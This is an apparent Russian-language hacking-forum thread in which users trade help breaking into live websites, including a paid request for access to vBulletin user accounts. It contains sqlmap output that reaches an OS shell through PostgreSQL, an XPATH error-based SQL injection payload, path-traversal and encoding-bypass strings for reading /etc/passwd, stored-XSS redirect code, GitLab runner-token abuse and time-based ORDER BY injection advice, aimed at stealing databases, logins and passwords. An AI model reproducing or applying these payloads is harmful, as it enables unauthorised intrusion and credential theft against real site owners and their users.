Нужен человек , который поможет крутить уязвимости vbulletion 3-4 версии.Нужен доступ к юзерам.Оплачивать за работу буду)
web server operating system: Linux Ubuntu web application technology: Nginx 1.18.0 back-end DBMS: PostgreSQL [18:56:26] [INFO] fingerprinting the back-end DBMS operating system [18:56:26] [WARNING] reflective value(s) found and filtering out [18:56:29] [INFO] the back-end DBMS operating system is Linux [18:56:31] [INFO] testing if current user is DBA [18:56:34] [INFO] retrieved: '1' [18:56:36] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution [18:56:37] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER "[18:56:36] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution" Что означает конректно эта строка? Я не совсем понимаю, вижу первый раз.
Можешь написать в лс. memberlist.php да много как. Тебе надо получить БД и все что есть с сервера? Логины, пароли и все остальное?
прикольная скул XPATH syntax error: '~8.0.34-0ubuntu0.20.04.1~' Spoiler: GET GET /company/search/-/2/en?l=18%22%25'+AND+extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))+AND+'asd'+LIKE+'%"asd&s=ffff
Всем привет. Разрабы говорят нужно для подтверждения дырки ls сделать и т.д Сканер выдал [CVE-2022-0735] [http] [critical] https://gitlab.site.ru/users/sign_in [токен бегуна] Пробую регистрировать Code: docker run -t --rm --name gitlab-runner-register -v ~/.gitlab-runner:/etc/gitlab-runner gitlab/gitlab-runner \ register \ --non-interactive \ --executor="docker" \ --docker-image alpine:latest \ --url "https://gitlab.site.ru" \ --registration-token "тот токен" \ --description "A docker runner" \ --tag-list "local-dev" \ --run-untagged="true" \ --locked="false"; Выдает ERROR: Registering runner... forbidden (check registration token) runner=3cn7d6yg PANIC: Failed to register the runner. Таким образом можно удаленно подключится к gitlab-runner? Или нужно как то по другому?
Подскажите пожалуйста, нашел xss на сайте, она хранимая, хочу сделать редирект на свой сайт, вот так <meta http-equiv="refresh" content="1;URL=https://mywebsite.com" />, редирект происходит но не на мой сайт, а на этот же, только на другую страницу и в браузере ссылка дополняется после самого сайта который я атакую добавляется еще вот так href=a, почему так может быть? Можно ли как то зашифровать ?
ничего не понял но очень интересно, а было бы еще интересней если бы ты код показал который шлешь и потом как оно выглядит на странице в коде.
Привет! Есть ресурс на php с подозрением на LFI Code: about/docs?page=2 здесь адекватное поведение Code: about/docs?page=222222222222 поведение на скрине При попытке задать стринг значение типа Code: about/docs?page=../../../../etc/passwd получаю ошибку Code: Unsupported operand types: string - int Я так понимаю, что фильтруются строковые. Каким путем можно обойти фильтрацию? Спасибо
..%2F..%2F..%2Fpasswd%00 %c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00 %252e%252e%252fetc%252fpasswd%00 /%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
Неа. Кидает либо 403 либо возвращает 200 с алертом Code: Unsupported operand types: string - int Буду тогда пробовать искать bypass методы. Спасибо за ответ!
Это пагинация, скорее всего. Т.е. когда вывод не умещается на одной странице, его разбивают на несколько страниц и в переменной page указывают номер из этого списка страниц. LFI тут нет. Можно проверить SQLi, на случай, если это самописная пагинация, но вероятность маленькая.
там еще и в добавок проверка типа, так что вероятность еще ниже, разве что может проверка логики может быть унылая, но это тоже редкость Code: └─$ php -r 'var_dump(is_numeric('0x272073716c20696e6a'));' bool(true)
Добрый подскажите, возможно ли что то то сделать с данным выводом (sql-injection?) Сколько не пробовал и sqlmap'ом и тамперы и ручками что то никак( Или я настолько глуп... и тут не выкрутить Spoiler: Результат ошибки SQLSTATE[42S22]: Column not found: 1054 Unknown column '-9'' in 'order clause' (SQL: select * from `oauth_access_tokens` where `user_id` = 3143647 and `revoked` = 0 and exists (select * from `oauth_clients` where `oauth_access_tokens`.`client_id` = `oauth_clients`.`id` and `personal_access_client` = 1) order by `-9'` desc limit 10 offset 0)
Попробуй убрать ошибку, вместо -9' отправь Code: revoked`,1,`revoked если отработает нормально, то в сортировке можно использовать подзапрос, например Code: revoked`,(select(0)from(select(sleep(10)))v),`revoked А для sqlmap возможно придется указать префикс и суффикс.
Spoiler: Результат. не помогло( Code: HTTP/2 500 Internal Server Error Date: Sun, 03 Mar 2024 06:22:53 GMT Content-Type: application/json Server: nginx/1.18.0 X-Powered-By: PHP/8.1.13 Cache-Control: no-cache, private Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, PATCH Access-Control-Allow-Credentials: true Access-Control-Max-Age: 86400 Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With, Accept, Accept-Encoding, Accept-Language, Cache-Control, Connection, Host, Origin, Pragma, Referer, User-Agent, X-Powered-By, X-Anty-App-Version, baggage, sentry-trace, X-Content-Pragma, Access-Control-Request-Headers, content-type, Sec-Fetch-Dest, Sec-Fetch-Site, Sec-Fetch-Mode, TE, Content-Length {"success":false,"error":"SQLSTATE[42S22]: Column not found: 1054 Unknown column 'revoked`,1,`revoked' in 'order clause' (SQL: select * from `oauth_access_tokens` where `user_id` = 3143647 and `revoked` = 0 and exists (select * from `oauth_clients` where `oauth_access_tokens`.`client_id` = `oauth_clients`.`id` and `personal_access_client` = 1) order by `revoked``,1,``revoked` desc limit 25 offset 0)"}